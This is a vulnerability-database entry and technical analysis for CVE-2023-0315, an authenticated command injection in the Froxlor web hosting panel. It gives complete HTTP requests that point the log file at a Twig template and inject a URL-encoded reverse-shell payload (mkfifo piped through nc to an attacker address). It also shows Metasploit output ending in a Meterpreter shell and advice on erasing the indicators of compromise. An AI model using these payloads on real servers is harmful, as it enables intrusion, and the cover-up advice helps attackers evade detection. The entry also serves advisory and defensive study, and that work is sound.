Attacker Value
Moderate
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
3

CVE-2023-0315

Disclosure Date: January 16, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated

Description

Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.

Add Assessment

1
Ratings
Technical Analysis

Attacker Value and Exploitability

Froxlor is a an open source web hosting control panel, with around 20,000 live instances listening on the internet at the time of writing. In versions <= 2.0.6 there exists an authenticated RCE vulnerability. Exploitation is trivia given credentials to the Froxlor application, as PoC details and a metasploit module are readily available, giving this vulnerability a moderate Attacker Value & Exploitability rating.

Vulnerability Details

Exploiting this vuln requires a few simple steps:

  • As an authenticated user, change the logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig this can be done by sending the following POST request to the server:
POST /froxlor/admin_settings.php?page=overview&part=logging HTTP/1.1
Host: 172.16.199.140
Content-Length: 1125
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.199.140
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt8L3nWBWoG1AKOVm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.199.140/froxlor/admin_settings.php?page=overview&part=logging
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=admjpmobmubbadpq6lpun95b8q
Connection: close

------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_enabled"

0
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_enabled"

1
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_severity"

2
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_logtypes[]"

file
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_logfile"

/var/www/html/froxlor/logs/froxlor.log
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_log_cron"

0
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="csrf_token"

cce9438c7954b65c86960649e5b95e8fc1157c61
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="page"

overview
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="action"


------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="send"

send
------WebKitFormBoundaryt8L3nWBWoG1AKOVm--

(Twig is a template engine for the PHP programming language. The file mentioned above, /footer.html.twig is the footer for the homepage of the Froxlor application and lucky for the attacker, it gets executed every time the homepage is refreshed.)

  • Next inject a payload into the new logfile with the following format: {{['COMMAND']|filter('exec')}}1 this will ensure the command will be executed when the .twig file is loaded. This can be achieved by changing the ‘theme’ of the froxlor application as an authenticated user with the following post request:
POST /froxlor/admin_index.php HTTP/1.1
Host: 172.16.199.140
Content-Length: 101
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.199.140
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.199.140/froxlor/admin_index.php?page=change_theme
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8nvcp4180gkp3n68ekgtgubvpt
Connection: close

theme=%7b%7b%5b%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%37%32%2e%31%36%2e%31%39%39%2e%31%20%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66%27%5d%7c%66%69%6c%74%65%72%28%27%65%78%65%63%27%29%7d%7d&csrf_token=caeb932a7ea81b18d82116300b79be5d8a008a10&page=change_theme&send=send&dosave=

In the above request, theme has been URL encoded and set to: {{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.199.1 4444 >/tmp/f']|filter('exec')}}

  • Now, with a listener setup, all the attacker has to do send the following GET request to trigger the payload (or reload the froxlor application in their browser) and they will have a shell running in the context of the application (which if running on Ubuntu in a default configuation would be user www-data):
GET /froxlor/admin_index.php? HTTP/1.1
Host: 172.16.199.140
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.199.140/froxlor/admin_index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8nvcp4180gkp3n68ekgtgubvpt
Connection: close

IOCs

As soon as the logfile path is changed to /footer.html.twig or any other .twig file the attacker chooses to target, the froxlor application begins writing log lines to that file. In the case of /footer.html.twig users will start to see log lines appearing in the at the bottom (or in the footer element) of the application like so:

Screen Shot 2023-02-14 at 3 26 17 PM

Once the attacker has injected their payload, the application will hang, as the payload is executed and the application runs off to connect to the attacker. Now, these IOCs can be covered up if the attacker changes the log file path back to it’s original setting and then erases the payload and additional log lines from footer.html.twig. The metasploit module covers up these IOCs, so if you plan on exploiting this vuln, be sure to make use of it.

Metasploit Module Demonstration:

msf6 > use exploit/linux/http/froxlor_log_path_rce
[*] Using exploit/linux/http/froxlor_log_path_rce
msf6 exploit(linux/http/froxlor_log_path_rce) > set rhosts 172.16.199.140
rhosts => 172.16.199.140
msf6 exploit(linux/http/froxlor_log_path_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/froxlor_log_path_rce) > set lport 9191
lport => 9191
msf6 exploit(linux/http/froxlor_log_path_rce) > set username admin
username => admin
msf6 exploit(linux/http/froxlor_log_path_rce) > set password notpassword
password => notpassword
msf6 exploit(linux/http/froxlor_log_path_rce) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:9191
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Successful login
[+] The target appears to be vulnerable. Vulnerable version found: 2.0.3
[+] Successfully Logged in!
[+] CSRF token is : 5701b7e6335ab13e20e91845b210b6be0bea7621
[+] Changed logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig
[*] Using URL: http://172.16.199.1:8080/ygs3pAWMRNIs
[+] Injected payload sucessfully
[*] Changing logfile path back to default value while triggering payload: /var/www/html/froxlor/logs/froxlor.log
[*] Client 172.16.199.140 (Wget/1.20.3 (linux-gnu)) requested /ygs3pAWMRNIs
[*] Sending payload to 172.16.199.140 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045348 bytes) to 172.16.199.140
[*] Cleaning up...
[*] Deleting tampered footer.html.twig file
[*] Rewriting clean footer.html.twig file
[*] Meterpreter session 3 opened (172.16.199.1:9191 -> 172.16.199.140:50398) at 2023-02-13 18:20:02 -0500
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.140
OS           : Ubuntu 20.04 (Linux 5.15.0-58-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • froxlor

Products

  • froxlor

Additional Info

Technical Analysis